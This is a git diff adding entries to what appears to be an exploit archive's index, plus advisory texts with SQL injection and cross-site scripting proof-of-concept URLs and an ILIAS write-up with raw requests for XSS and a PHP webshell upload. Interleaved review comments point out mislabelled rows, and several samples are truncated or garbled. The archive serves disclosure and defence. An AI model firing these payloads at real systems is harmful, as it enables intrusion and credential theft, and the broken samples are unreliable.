diff --git a/files.csv b/files.csv
index ab7ed3521..1d512090f 100755
--- a/files.csv
+++ b/files.csv
@@ -28229,6 +28229,7 @@ id,file,description,date,author,platform,type,port
31419,platforms/php/webapps/31419.txt,"TopicsViewer 3.0 Beta 1 - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80
31420,platforms/php/webapps/31420.txt,"Eventy Online Scheduler 1.8 - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80
31421,platforms/php/webapps/31421.txt,"Booking Calendar - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80
+31423,platforms/windows/webapps/31423.txt,"IBM Business Process Manager - User Account Reconfiguration",2014-02-05,0in,windows,webapps,0
31424,platforms/php/webapps/31424.txt,"Wordpress Dandelion Theme - Arbitry File Upload",2014-02-05,TheBlackMonster,php,webapps,80
31425,platforms/hardware/webapps/31425.txt,"D-Link DIR-100 - Multiple Vulnerabilities",2014-02-05,"Felix Richter",hardware,webapps,80
31426,platforms/php/webapps/31426.txt,"Plogger 1.0 (RC1) - Multiple Vulnerabilities",2014-02-05,killall-9,php,webapps,80
@@ -28550,6 +28551,7 @@ id,file,description,date,author,platform,type,port
31757,platforms/multiple/remote/31757.txt,"ZyWALL 100 HTTP Referer Header Cross Site Scripting Vulnerability",2008-05-08,"Deniz Cevik",multiple,remote,0
31758,platforms/hardware/remote/31758.py,"WRT120N 1.0.0.7 Stack Overflow",2014-02-19,"Craig Heffner",hardware,remote,80
31759,platforms/windows/remote/31759.txt,"Microsoft Internet Explorer 2.0 UTF-7 HTTP Response Handling Weakness",2008-05-08,"Yaniv Miron",windows,remote,0
+31760,platforms/windows/webapps/31760.txt,"Lotus Sametime 8.5.1 - Password Disclosure",2014-02-19,"Adriano Marcio Monteiro",windows,webapps,5081
31762,platforms/windows/dos/31762.py,"Catia V5-6R2013 ""CATV5_AllApplications"" - Stack Buffer Overflow",2014-02-19,"Mohamed Shetta",windows,dos,55555
31763,platforms/windows/dos/31763.py,"SolidWorks Workgroup PDM 2014 SP2 Opcode 2001 - Denial of Service",2014-02-19,"Mohamed Shetta",windows,dos,30000
31764,platforms/hardware/webapps/31764.txt,"Dlink DIR-615 Hardware vE4 Firmware v5.10 - CSRF Vulnerability",2014-02-19,"Dhruv Shah",hardware,webapps,80
@@ -28601,3 +28603,34 @@ id,file,description,date,author,platform,type,port
31811,platforms/asp/webapps/31811.txt,"Site Tanitimlari Scripti Multiple SQL Injection Vulnerabilities",2008-05-20,"fahn zichler",asp,webapps,0
31812,platforms/asp/webapps/31812.txt,"DizaynPlus Nobetci Eczane Takip 1.0 'ayrinti.asp' Parameter SQL Injection Vulnerability",2008-05-20,U238,asp,webapps,0
31813,platforms/php/webapps/31813.txt,"eCMS 0.4.2 Multiple Security Vulnerabilities",2008-05-20,hadihadi,php,webapps,0
+31814,platforms/windows/remote/31814.py,"Mini HTTPD 1.21 - Stack Buffer Overflow POST Exploit",2014-02-22,"OJ Reeves",windows,remote,0
+31815,platforms/linux/dos/31815.html,"libxslt XSL <= 1.1.23 File Processing Buffer Overflow Vulnerability",2008-05-21,"Anthony de Almeida Lopes",linux,dos,0
+31816,platforms/java/webapps/31816.txt,"SAP Web Application Server 7.0 '/sap/bc/gui/sap/its/webgui/' Cross-Site Scripting Vulnerability",2008-05-21,DSecRG,java,webapps,0
+31817,platforms/multiple/dos/31817.html,"Mozilla Firefox 2.0.0.14 JSframe Heap Corruption Denial of Service Vulnerability",2008-05-21,0x000000,multiple,dos,0
+31818,platforms/windows/dos/31818.sh,"vsftpd FTP Server 2.0.5 'deny_file' Option Remote Denial of Service Vulnerability (1)",2008-05-21,"Martin Nagy",windows,dos,0
+31819,platforms/windows/dos/31819.pl,"vsftpd FTP Server 2.0.5 'deny_file' Option Remote Denial of Service Vulnerability (2)",2008-05-21,"Praveen Darshanam",windows,dos,0
+31820,platforms/unix/remote/31820.pl,"IBM Lotus Sametime <= 8.0 Multiplexer Buffer Overflow Vulnerability",2008-05-21,"Manuel Santamarina Suarez",unix,remote,0
+31821,platforms/php/webapps/31821.txt,"phpFreeForum 1.0 rc2 error.php message Parameter XSS",2008-05-22,tan_prathan,php,webapps,0
+31822,platforms/php/webapps/31822.txt,"phpFreeForum 1.0 rc2 part/menu.php Multiple Parameter XSS",2008-05-22,tan_prathan,php,webapps,0
+31823,platforms/php/webapps/31823.txt,"phpSQLiteCMS 1 RC2 cms/includes/header.inc.php Multiple Parameter XSS",2008-05-22,"CWH Underground",php,webapps,0
+31824,platforms/php/webapps/31824.txt,"phpSQLiteCMS 1 RC2 cms/includes/login.inc.php Multiple Parameter XSS",2008-05-22,"CWH Underground",php,webapps,0
+31825,platforms/php/webapps/31825.txt,"BMForum 5.6 index.php outpused Parameter XSS",2008-05-22,"CWH Underground",php,webapps,0
+31826,platforms/php/webapps/31826.txt,"BMForum 5.6 newtem/footer/bsd01footer.php Multiple Parameter XSS",2008-05-22,"CWH Underground",php,webapps,0
+31827,platforms/php/webapps/31827.txt,"BMForum 5.6 newtem/header/bsd01header.php Multiple Parameter XSS",2008-05-22,"CWH Underground",php,webapps,0
+31828,platforms/hardware/remote/31828.txt,"Barracuda Spam Firewall <= 3.5.11 'ldap_test.cgi' Cross-Site Scripting Vulnerability",2008-05-22,"Information Risk Management Plc",hardware,remote,0
+31829,platforms/php/webapps/31829.txt,"AbleDating 2.4 search_results.php keyword Parameter SQL Injection",2008-05-22,"Ali Jasbi",php,webapps,0
+31830,platforms/php/webapps/31830.txt,"AbleDating 2.4 search_results.php keyword Parameter XSS",2008-05-22,"Ali Jasbi",php,webapps,0
+31831,platforms/windows/remote/31831.py,"SolidWorks Workgroup PDM 2014 SP2 - Arbitrary File Write Vulnerability",2014-02-22,"Mohamed Shetta",windows,remote,30000
+31833,platforms/php/webapps/31833.txt,"ILIAS 4.4.1 - Multiple Vulnerabilities",2014-02-22,HauntIT,php,webapps,80
+31834,platforms/php/webapps/31834.txt,"Wordpress AdRotate Plugin 3.9.4 (clicktracker.php, track param) - SQL Injection",2014-02-22,"High-Tech Bridge SA",php,webapps,80
+31835,platforms/php/webapps/31835.txt,"SAFARI Montage 3.1.3 'forgotPW.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,"Omer Singer",php,webapps,0
+31836,platforms/php/webapps/31836.txt,"WordPress Upload File Plugin 'wp-uploadfile.php' SQL Injection Vulnerability",2008-05-24,eserg.ru,php,webapps,0
+31837,platforms/php/webapps/31837.txt,"DZOIC Handshakes 3.5 'fname' Parameter SQL Injection Vulnerability",2008-05-24,"Ali Jasbi",php,webapps,0
+31838,platforms/php/webapps/31838.txt,"Horde Multiple Product workweek.php timestamp Parameter XSS",2008-05-24,"Ivan Sanchez",php,webapps,0
+31839,platforms/php/webapps/31839.txt,"Horde Multiple Product week.php timestamp Parameter XSS",2008-05-24,"Ivan Sanchez",php,webapps,0
+31840,platforms/php/webapps/31840.txt,"Horde Multiple Product day.php timestamp Parameter XSS",2008-05-24,"Ivan Sanchez",php,webapps,0
+31841,platforms/php/webapps/31841.txt,"miniCWB 2.1.1 'connector.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-26,"CWH Underground",php,webapps,0
+31842,platforms/php/webapps/31842.txt,"AbleSpace 1.0 'adv_cat.php' SQL Injection Vulnerability",2008-05-26,Jasbi,php,webapps,0
+31843,platforms/asp/webapps/31843.txt,"Excuse Online 'pwd.asp' SQL Injection Vulnerability",2008-05-26,Unohope,asp,webapps,0
+31844,platforms/php/webapps/31844.txt,"phpFix 2.0 fix/browse.php kind Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0
+31845,platforms/php/webapps/31845.txt,"phpFix 2.0 auth/00_pass.php account Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0
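Review bot: Rows 31818 and 31819 file the vsftpd 2.0.5 'deny_file' denial-of-service entries under platform `windows` and path `platforms/windows/dos/`, although vsftpd is a Unix/Linux FTP daemon. Anyone filtering the index by platform to check exposure will miss them on the hosts that actually run the service. The platform column and path should read `linux` (or `unix`), e.g. `31818,platforms/linux/dos/31818.sh,...,linux,dos,0`, with the two files moved to match. Those files are not part of the visible diff, so the move would have to be made there as well.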
diff --git a/platforms/asp/webapps/31843.txt b/platforms/asp/webapps/31843.txt
new file mode 100755
index 000000000..2ce0257f5
--- /dev/null
+++ b/platforms/asp/webapps/31843.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/29370/info
+
+Excuse Online is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/excuse/MainProgram/pwd.asp?pwd=blah&pID='+or+???+like+'%25
+http://www.example.com/excuse/MainProgram/pwd.asp?pwd=blah&pID='+or+??+like+'%25
\ No newline at end of file
diff --git a/platforms/hardware/remote/31828.txt b/platforms/hardware/remote/31828.txt
new file mode 100755
index 000000000..339e29d6a
--- /dev/null
+++ b/platforms/hardware/remote/31828.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29340/info
+
+Barracuda Spam Firewall is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Firmware prior to Barracuda Spam Firewall 3.5.11.025 is vulnerable.
+
+https://www.example.com/cgi-bin/ldap_test.cgi?host=127.0.0.1&port=1&tl s_mode=tls_mode&tls_require=&username=&password=&filter=&searchbase=&uni que_attr=&email_attr=&domain=*&email=%3Cscript%3Ealert(document.cookie)% 3C/script%3E
\ No newline at end of file
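Review bot: The affected-version statement `Firmware prior to Barracuda Spam Firewall 3.5.11.025 is vulnerable` does not match the index row for 31828 in files.csv, which says `<= 3.5.11`, so a reader triaging by version cannot tell whether 3.5.11 builds at or above .025 are affected. The index title should carry the same bound as the text, e.g. `Barracuda Spam Firewall < 3.5.11.025`. The sample request on the last added line also has spaces inside parameter names (`tl s_mode`, `uni que_attr`). These look like line-wrap artefacts from the source page and make the line unreliable as a reference for signature or log matching.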
diff --git a/platforms/java/webapps/31816.txt b/platforms/java/webapps/31816.txt
new file mode 100755
index 000000000..60d08d9a2
--- /dev/null
+++ b/platforms/java/webapps/31816.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29317/info
+
+SAP Web Application Server is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+SAP Web Application Server 7.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/sap/bc/gui/sap/its/webgui/aaaaaaa">
\ No newline at end of file
diff --git a/platforms/linux/dos/31815.html b/platforms/linux/dos/31815.html
new file mode 100755
index 000000000..f6feae71f
--- /dev/null
+++ b/platforms/linux/dos/31815.html
@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/29312/info
+
+The 'libxslt' library is prone to a buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data.
+
+An attacker may exploit this issue to execute arbitrary code with the privileges of the user running an application that relies on the affected library. Failed exploit attempts will likely result in denial-of-service conditions.
+
+This issue affects libxslt 1.1.23 and prior versions.
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
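Review bot: After the three description paragraphs this file adds only blank lines, so the `.html` entry indexed as a `dos` sample contains no markup at all; the content was presumably stripped during import. The same loss appears in `platforms/multiple/dos/31817.html` (description followed by empty lines), and probably in 31816.txt and 31822.txt through 31827.txt, whose sample URLs stop at `">` or at an empty `param=`. As committed, these records cannot be used to confirm or regression-test a fix, so each should at least say so, e.g. with a closing line `NOTE: sample content was not preserved in this copy; see the source URL above.`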
diff --git a/platforms/multiple/dos/31817.html b/platforms/multiple/dos/31817.html
new file mode 100755
index 000000000..df31f7b8a
--- /dev/null
+++ b/platforms/multiple/dos/31817.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29318/info
+
+Mozilla Firefox is prone to a remote denial-of-service vulnerability when running certain JavaScript commands on empty applets in an iframe.
+
+Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
+
+This issue affects Firefox 2.0.0.14; other versions may also be vulnerable.
+
+
diff --git a/platforms/php/webapps/31821.txt b/platforms/php/webapps/31821.txt
new file mode 100755
index 000000000..69b8fbbbc
--- /dev/null
+++ b/platforms/php/webapps/31821.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/29337/info
+
+phpFreeForum is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/[phpfreeforum_path]/html/error.php?message=<XSS>
\ No newline at end of file
diff --git a/platforms/php/webapps/31822.txt b/platforms/php/webapps/31822.txt
new file mode 100755
index 000000000..83f981a05
--- /dev/null
+++ b/platforms/php/webapps/31822.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/29337/info
+
+phpFreeForum is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/[phpfreeforum_path]/html/part/menu.php?nickname=
+http://www.example.com/[phpfreeforum_path]/html/part/menu.php?randomid=
\ No newline at end of file
diff --git a/platforms/php/webapps/31823.txt b/platforms/php/webapps/31823.txt
new file mode 100755
index 000000000..9ca3b8c1c
--- /dev/null
+++ b/platforms/php/webapps/31823.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/29338/info
+
+phpSQLiteCMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+phpSQLiteCMS 1 RC2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[home]=
+http://www.example.com/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[admin_menu]=
+http://www.example.com/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[admin_menu_page_overview]=
\ No newline at end of file
diff --git a/platforms/php/webapps/31824.txt b/platforms/php/webapps/31824.txt
new file mode 100755
index 000000000..7206f4d0a
--- /dev/null
+++ b/platforms/php/webapps/31824.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/29338/info
+
+phpSQLiteCMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+phpSQLiteCMS 1 RC2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[phpsqlitecms_path]/cms/includes/login.inc.php?lang[login_username]=
+http://www.example.com/[phpsqlitecms_path]/cms/includes/login.inc.php?lang[login_password]=
+
diff --git a/platforms/php/webapps/31825.txt b/platforms/php/webapps/31825.txt
new file mode 100755
index 000000000..6942e0f93
--- /dev/null
+++ b/platforms/php/webapps/31825.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29339/info
+
+BMForum is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+BMForum 5.6 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[BBForum_path]/index.php?outpused=
\ No newline at end of file
diff --git a/platforms/php/webapps/31826.txt b/platforms/php/webapps/31826.txt
new file mode 100755
index 000000000..a5f0682e9
--- /dev/null
+++ b/platforms/php/webapps/31826.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/29339/info
+
+BMForum is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+BMForum 5.6 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[BBForum_path]/newtem/footer/bsd01footer.php?footer_copyright=
+http://www.example.com/[BBForum_path]/newtem/footer/bsd01footer.php?verandproname=
\ No newline at end of file
diff --git a/platforms/php/webapps/31827.txt b/platforms/php/webapps/31827.txt
new file mode 100755
index 000000000..d6bef5505
--- /dev/null
+++ b/platforms/php/webapps/31827.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/29339/info
+
+BMForum is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+BMForum 5.6 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[BBForum_path]/newtem/header/bsd01header.php?topads=
+http://www.example.com/[BBForum_path]/newtem/header/bsd01header.php?myplugin=
\ No newline at end of file
diff --git a/platforms/php/webapps/31829.txt b/platforms/php/webapps/31829.txt
new file mode 100755
index 000000000..78c583154
--- /dev/null
+++ b/platforms/php/webapps/31829.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/29342/info
+
+AbleDating is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include an SQL-injection vulnerability and a cross-site scripting vulnerability.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, execute arbitrary local scripts, retrieve potentially sensitive information, or exploit latent vulnerabilities in the underlying database.
+
+These issues affect AbleDating 2.4; other versions may also be vulnerable.
+
+
+http://www.example.com/search_results.php?p_age_from=18&p_age_to=18&keyword=[sql injection]&status=online&save_search=on&search_name=My%20search&photo=on&p_orientation%255B%255D=2&order=rating&sort=desc&p_relation%255B%255D=4&search
\ No newline at end of file
diff --git a/platforms/php/webapps/31830.txt b/platforms/php/webapps/31830.txt
new file mode 100755
index 000000000..4725a5943
--- /dev/null
+++ b/platforms/php/webapps/31830.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29342/info
+
+AbleDating is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include an SQL-injection vulnerability and a cross-site scripting vulnerability.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, execute arbitrary local scripts, retrieve potentially sensitive information, or exploit latent vulnerabilities in the underlying database.
+
+These issues affect AbleDating 2.4; other versions may also be vulnerable.
+
+http://www.example.com/search_results.php?p_orientation%5B%5D=2&p_age_from=18&p_age_to=18&p_relation%5B%5D=on&keyword=>'>&status=online&save_search=on&search_name=My%20search&photo=on
\ No newline at end of file
diff --git a/platforms/php/webapps/31833.txt b/platforms/php/webapps/31833.txt
new file mode 100755
index 000000000..17fb5663a
--- /dev/null
+++ b/platforms/php/webapps/31833.txt
@@ -0,0 +1,171 @@
+# ==============================================================
+# Title ...| Multiple vulnerabilities in ILIAS
+# Version .| ilias-4.4.1.zip
+# Date ....| 21.02.2014
+# Found ...| HauntIT Blog
+# Home ....| www.ilias.de
+# ==============================================================
+
+First from admin user logged in:
+
+# ==============================================================
+# 1. Persistent xss
+
+------
+
+POST /k/cms/ilias/ilias.php?wsp_id=2&cmd=post&cmdClass=ilobjbloggui&cmdNode=mw:my:ma&baseClass=
+ilPersonalDesktopGUI&fallbackCmd=createPosting&rtoken=6bac7751a71721f25adb9e579dea4344 HTTP/1.1
+Host: 10.149.14.62
+(...)
+Content-Length: 91
+
+title=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&cmd%5BcreatePosting%5D=Add+Posting
+------
+
+
+# ==============================================================
+# 2. Possibility of uploading webshell
+
+Uploaded file can be found in the ILIAS directories, for example:
+------
+k@lab:~/public_html/cms/ilias$ cat ./44444/ilFile/3/file_334/001/shell.php
+
+k@lab:~/public_html/cms/ilias$
+------
+
+Direct access to this file will give you a webshell.
+
+*
+* This bug will be described later in section for 'normal/registered' user.
+*
+
+
+# ==============================================================
+# 3. XSS
+
+------
+POST /k/cms/ilias/ilias.php?ref_id=1&new_type=webr&cmd=post&cmdClass=ilobjlinkresourcegui&
+cmdNode=nm:9y&baseClass=ilRepositoryGUI&rtoken=6bac7751a71721f25adb9e579dea4344 HTTP/1.1
+Host: 10.149.14.62
+(...)
+Content-Length: 760
+
+tar_mode=ext&tar='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&tar_val=%3Cdiv+id%3D%22tar_value
+%22%3E%0D%0A%09%0D%0A%3C%2Fdiv%3E%09%0D%0A%3Cdiv+class%3D%22small%22%3E%0D%0A%09%3Ca+id%3D%
+22tar_ajax%22+class%3D%22iosEditInternalLinkTrigger%22+href%3D%22ilias.php%3Fref_id%3D1%26n
+ew_type%3Dwebr%26postvar%3Dtar%26cmdClass%3Dilinternallinkgui%26cmdNode%3Dnm%3A9y%3A3l%3A3z
+%3A3s%3Ai1%26baseClass%3DilRepositoryGUI%26cmdMode%3Dasynch%22%3E%26raquo%3B+Select+Target+
+Object%3C%2Fa%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3Cdiv+class%3D%22small++ilNoDisplay%22+id%3D%22tar
+_rem%22%3E%0D%0A%09%3Ca+class%3D%22ilLinkInputRemove%22+href%3D%22%23%22%3E%26raquo%3B+Remo
+ve%3C%2Fa%3E%0D%0A%3C%2Fdiv%3E&tar_ajax_type=&tar_ajax_id=&tar_ajax_target=&tit=asdasd&des=
+asdasd&cmd%5Bsave%5D=Add+Weblink
+
+------
+
+------
+
+Target: *
+
+" size="40"
+maxlength="500" />
+
+------
+
+
+
+
+# ==============================================================
+# 4. Another webshell upload possibility
+
+There is a possibility of creating webshell when php file is added as an attachement
+to email to user(s).
+
+
+All shells will be located in /ilias/ (wwwroot) directory with value from 'client_id'
+(for example: client_id=44444, then your shell is in /ilias/44444/...)
+
+
+
+# ==============================================================
+
+Second: from normal/registered user logged in:
+
+# ==============================================================
+# 1. When normal user is registered on the latest ILIAS, he is able to add
+PHP file contains simple shell. From this moment he will be able to hack
+the whole server.
+
+------
+POST /k/cms/ilias/ilias.php?wsp_id=41&new_type=file&cmd=post&cmdClass=
+ilobjfilegui&cmdNode=mw:my:jh&baseClass=ilPersonalDesktopGUI&fallbackC
+md=uploadFiles&rtoken=2e4e8af720b2204ea51503ca6388a325 HTTP/1.1
+Host: 10.149.14.62
+(...)
+Cache-Control: no-cache
+
+-----------------------------1761332042190
+Content-Disposition: form-data; name="title"
+
+shell.php
+-----------------------------1761332042190
+Content-Disposition: form-data; name="description"
+
+
+-----------------------------1761332042190
+Content-Disposition: form-data; name="extract"
+
+0
+-----------------------------1761332042190
+Content-Disposition: form-data; name="keep_structure"
+
+0
+-----------------------------1761332042190
+Content-Disposition: form-data; name="upload_files"; filename="shell.php"
+Content-Type: application/octet-stream
+
+
+-----------------------------1761332042190--
+
+------
+
+
+# ==============================================================
+# 2. XSS (same place like when admin is logged in)
+
+
+------
+POST /k/cms/ilias/ilias.php?wsp_id=41&new_type=webr&cmd=post&cmdClass=ilobjlinkresource
+gui&cmdNode=mw:my:9y&baseClass=ilPersonalDesktopGUI&rtoken=1561f316d721f9683b0ae5f0b652db25 HTTP/1.1
+Host: 10.149.14.62
+(...)
+Content-Length: 768
+
+tar_mode=ext&tar='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&tar_val=%3Cdiv+id%3D%22
+tar_value%22%3E%0D%0A%09%0D%0A%3C%2Fdiv%3E%09%0D%0A%3Cdiv+class%3D%22small%22%3E%0
+D%0A%09%3Ca+id%3D%22tar_ajax%22+class%3D%22iosEditInternalLinkTrigger%22+href%3D%2
+2ilias.php%3Fwsp_id%3D41%26new_type%3Dwebr%26postvar%3Dtar%26cmdClass%3Dilinternal
+linkgui%26cmdNode%3Dmw%3Amy%3A9y%3A3l%3A3z%3A3s%3Ai1%26baseClass%3DilPersonalDeskt
+opGUI%26cmdMode%3Dasynch%22%3E%26raquo%3B+Select+Target+Object%3C%2Fa%3E%0D%0A%3C%
+2Fdiv%3E%0D%0A%3Cdiv+class%3D%22small++ilNoDisplay%22+id%3D%22tar_rem%22%3E%0D%0A%
+09%3Ca+class%3D%22ilLinkInputRemove%22+href%3D%22%23%22%3E%26raquo%3B+Remove%3C%2F
+a%3E%0D%0A%3C%2Fdiv%3E&tar_ajax_type=&tar_ajax_id=&tar_ajax_target=&tit=asdasd&des
+=dsa&cmd%5Bsave%5D=Add+Weblink
+------
+
+
+
+# ==============================================================
+# 3. Persistent xss
+
+------
+POST /k/cms/ilias/ilias.php?wsp_id=111&bmn=2014-02&cmd=post&cmdClass=ilobjbloggui&cmdNode=mw:my:ma&baseClass=ilPersonalDesktopGUI&fallbackCmd=createPosting&rtoken=1561f316d721f9683b0ae5f0b652db25 HTTP/1.1
+Host: 10.149.14.62
+(...)
+Content-Length: 89
+
+title=%27%3E%22%3E%3Cbody%2Fonload%3Dalert%28123%29%3E&cmd%5BcreatePosting%5D=Add+Posting
+------
+
+
+# ==============================================================
+# More @ http://HauntIT.blogspot.com
\ No newline at end of file
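Review bot: The write-up gives no remediation, fixed version or vendor-notification status for any of its seven findings, so a reader running ILIAS 4.4.1 has nothing to act on. Since the text itself states that uploaded files land under the web root in the `client_id` directory, a short mitigation line would help, for example `# Mitigation | deny script execution under the <client_id> data directory; restrict uploadable file types`. The header block would also benefit from a `# Fix .....|` field next to `# Version` and `# Date`, marked as unknown if the author did not confirm one. The request samples embed `rtoken` values and an internal host address from the author's lab, which are worth labelling as lab data.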
diff --git a/platforms/php/webapps/31834.txt b/platforms/php/webapps/31834.txt
new file mode 100755
index 000000000..4e019a012
--- /dev/null
+++ b/platforms/php/webapps/31834.txt
@@ -0,0 +1,60 @@
+Advisory ID: HTB23201
+Product: AdRotate
+Vendor: AJdG Solutions
+Vulnerable Version(s): 3.9.4 and probably prior
+Tested Version: 3.9.4
+Advisory Publication: January 30, 2014 [without technical details]
+Vendor Notification: January 30, 2014
+Vendor Patch: January 31, 2014
+Public Disclosure: February 20, 2014
+Vulnerability Type: SQL Injection [CWE-89]
+CVE Reference: CVE-2014-1854
+Risk Level: High
+CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
+Solution Status: Fixed by Vendor
+Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
+
+-----------------------------------------------------------------------------------------------
+
+Advisory Details:
+
+High-Tech Bridge Security Research Lab discovered vulnerability in AdRotate, which can be exploited to perform SQL Injection attacks.
+
+
+1) SQL Injection in AdRotate: CVE-2014-1854
+
+The vulnerability exists due to insufficient validation of "track" HTTP GET parameter passed to
+ "/wp-content/plugins/adrotate/library/clicktracker.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.
+
+The following PoC code contains a base64-encoded string "-1 UNION SELECT version(),1,1,1", which will be injected into SQL query and will output MySQL server version:
+
+http://[host]/wp-content/plugins/adrotate/library/clicktracker.php?track=LTEgVU5JT04gU0VMRUNUIHZlcnNpb24oKSwxLDEsMQ==
+
+Successful exploitation will result in redirection to local URI that contains version of the MySQL server:
+http://[host]/wp-content/plugins/adrotate/library/5.1.71-community-log
+
+
+-----------------------------------------------------------------------------------------------
+
+Solution:
+
+Update to AdRotate 3.9.5
+
+More Information:
+http://www.adrotateplugin.com/2014/01/adrotate-pro-3-9-6-and-adrotate-free-3-9-5/
+http://wordpress.org/plugins/adrotate/changelog/
+http://www.adrotateplugin.com/development/
+
+-----------------------------------------------------------------------------------------------
+
+References:
+
+[1] High-Tech Bridge Advisory HTB23201 - https://www.htbridge.com/advisory/HTB23201 - SQL Injection in AdRotate.
+[2] AdRotate - http://wordpress.org/plugins/adrotate/ - AdRotate for WordPress.
+[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
+[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
+[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
+
+-----------------------------------------------------------------------------------------------
+
+Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
\ No newline at end of file
diff --git a/platforms/php/webapps/31835.txt b/platforms/php/webapps/31835.txt
new file mode 100755
index 000000000..8d10b8b7f
--- /dev/null
+++ b/platforms/php/webapps/31835.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29343/info
+
+SAFARI Montage is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+SAFARI Montage 3.1.3 is vulnerable; other versions may also be affected.
+
